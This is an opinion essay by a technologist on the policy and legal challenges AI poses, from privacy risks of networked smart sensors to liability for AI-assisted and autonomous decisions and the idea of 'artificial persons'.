Smarter sensors will come in various forms, not least as part of the Internet of Things (IoT), and their aggregated data will have implications for privacy. 20th century “dumb lenses” are already being connected to systems that can pick out number plates or human faces but truly smart sensors could know almost anything about us, from what is in our fridge and on our grocery list, to where we are going and whom we will meet. It is this aggregated, networked aspect of smarter sensors that will be at the core of the first AI challenge for policy-makers. As they become discriminating enough to anticipate what we might do next, e.g. in order to offer us useful information ahead of time, they create an inadvertent panopticon that the unscrupulous and actively criminal can exploit.

Moving past this challenge, AI will become able to support and enhance human decision-making. Human input will still be essential but it might be as limited as a “go/no go” on an AI-generated proposal. From a legal perspective, mens rea or scope of liability might not be wholly thrown into confusion, as a human decision-maker remains. Narrow applications in certain highly technical areas, e.g. medicine or engineering, might be practical but day-to-day users could be flummoxed if every choice had unreadable but legally essential Terms & Conditions. The policy-making response may be to use tort/liability law, obligatory insurance for AI providers/users, or new risk management systems to hedge the downside of AI-enhanced decision-making without losing the full utility of the technology.

Once decision-making is possible without human input, we begin to enter the realm of speculation.  However, it is important to remember that there are already high-frequency trading (HFT) systems in financial markets that operate independent of direct human oversight, following algorithmic instructions. The suggested linkages between “flash crash” events and HFT highlight, nonetheless, the problems policy-makers and regulators will face. It may be hard to foresee what even a “limited” AI might do in certain circumstances, and the ex-ante legal liability controls mentioned above may seem insufficient to policy-makers should a system get out of control, either in the narrow sense of being out of the control of those people legally responsible for it, or in the general sense of it being out of control of anybody.

These three stages would suggest significant challenges for policy-makers, with existing legal processes losing their applicability as AI moves further away from direct human responsibility. The law is, however adaptable, and solutions could emerge. In extremis we might, for example, be willing to add to the concept of “corporate persons” with a concept of “artificial persons”. Would any of us feel safer if we could assign legal liability to the AIs themselves and then sue them as we do corporations and businesses? Maybe.

In summary then, the true challenges for AI’s development may not exist solely in the big ticket moments of beating chess masters or passing Turing Tests. Instead, there will be any number of roadblocks caused by the needs of regulatory and policy processes systems still rooted in the 19th and 20th centuries. And, odd though this may sound from a technologist like me, that delay might be a good thing, given the potential transformative power of AI.

 

]]>